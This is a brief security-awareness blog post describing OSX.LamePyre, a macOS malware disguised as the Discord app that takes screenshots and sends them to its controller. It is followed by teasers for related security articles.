This Mac Malware Takes Screenshots Of Your Computer

January 1, 2019

Written by wukovits

There’s a new malware threat in the MacOS ecosystem called OSX.LamePyre.  If you haven’t heard of it yet, it belongs on your radar.

At the moment, industry experts agree that it’s more of a crude work in progress.  Unfortunately, the danger of crude works in progress is that the hackers continue to develop them, making them a threat that gets worse over time.

In this case, LamePyre is limited to maintaining a back door into the infected system and taking screenshots at periodic intervals and sends them back to the hacker controlling the malware.

The only instance of LamePyre found in the wild so far is one that’s disguised as the Discord messaging app, which is widely used by gamers.  Unfortunately, this poisoned version of Discord doesn’t actually function.  It’s simply a shell that contains an Automator script and displays the generic Automator icon in the menu bar when it’s running.

When a user downloads the poisoned version of Discord, the Automator script decodes the malware payload, which is written in Python. Then, the malware begins taking screenshots at predefined intervals and sending them back to the hacker’s command and control server.

There are two risks then:  First, the hacker who controls the script will see pretty much everything you’re working on.  Second, since it opens a channel between the infected machine and the c2 server, it allows the hacker to inject additional malware onto the system, at will.  Not good.

If you or anyone in your employ uses the Discord messaging app, this is an emerging threat to watch.  Fortunately, it’s easily removed and dealt with (for now), but that could easily change as whomever created the app can easily build it out more completely and make it a significantly worse threat.

Used with permission from Article Aggregator

Bayou Tech

We provide solutions for your business. Find out how we can help.

Related Articles

Some Amazon Device Features May Have Security Risks

Have you heard of Amazon Sidewalk? If not, it's definitely something you should be aware of. Depending on your point of view, the new feature, which was enabled by default on a wide range of Amazon devices by default on June 8 of this year (2021) is either...

Email Unsubscribe Scam Can Easily Fool Any User

Scammers are increasingly relying on a tried and true bit of social engineering to fool unsuspecting users into unwittingly signing up to receive a flood of additional spam email. They accomplish this by blasting out an email asking recipients if they wish to...

Update VMWare Software Immediately To Avoid Possible Attack

The US Cybersecurity and Infrastructure Security Agency recently issued a warning to all companies running VMware Vcenter Server and VMware Cloud Foundation. They are asking them to download and apply the latest security patches as soon as possible because attackers...

Send us a message

Your message was sent.